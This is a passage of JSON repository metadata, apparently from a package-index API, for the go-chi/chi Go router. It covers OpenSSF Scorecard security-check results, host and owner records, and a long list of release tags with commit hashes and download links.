8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositori